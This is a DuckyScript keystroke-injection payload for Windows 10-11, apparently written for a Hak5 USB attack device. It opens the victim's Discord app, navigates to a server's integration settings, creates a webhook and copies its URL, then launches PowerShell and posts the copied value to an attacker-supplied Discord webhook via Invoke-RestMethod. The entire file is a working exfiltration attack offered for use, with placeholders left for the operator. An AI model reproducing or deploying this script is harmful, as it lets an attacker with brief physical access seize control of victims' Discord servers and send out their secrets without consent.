REM ###############################################################
REM #                                                             |
REM # Title        : Create And Exfiltrate A Webhook Of Discord   |
REM # Author       : Aleff                                        |
REM # Version      : 1.0                                          |
REM # Category     : Exfiltration                                 |
REM # Target       : Windows 10-11                                |
REM #                                                             |
REM ###############################################################


REM Requirements:
REM     - Internet connection
REM     - Discord Installed

REM You must define the Discord server name i.e. Hak5
DEFINE #SERVER_NAME example

REM You must define your Discord webhook if you want to use this method for the exfiltration
DEFINE #DISCORD_WEBHOOK example

DEFAULT_DELAY 500

REM Open Discord app
GUI
STRINGLN Discord

REM It depends
DELAY 6000

REM Search by Discord keyboard shortcut and open it
CTRL k
STRING *
STRINGLN #SERVER_NAME

REM Go to first channel and open the settings
REPEAT 11 TAB
ENTER

REM Open Integrations section
REPEAT 6 TAB
REPEAT 3 DOWNARROW
ENTER

REM Webhooks settings
REPEAT 2 TAB
ENTER

REM Create Webhook
REPEAT 3 TAB
ENTER

REM Select first Webhook
TAB
ENTER

REM Copy Webhook
REPEAT 5 TAB
SPACE

REM Close Discord
ALT F4

REM Open a PowerShell
GUI r
STRINGLN powershell
DELAY 2000

REM Exfiltration using Discord Webhook
STRINGLN $WebhookUrl = "#DISCORD_WEBHOOK"

STRING $Payload = @{content = "
CTRL v
STRINGLN "} | ConvertTo-Json

STRINGLN Invoke-RestMethod -Uri $WebhookUrl -Method Post -Body $Payload -ContentType 'application/json'; exit;
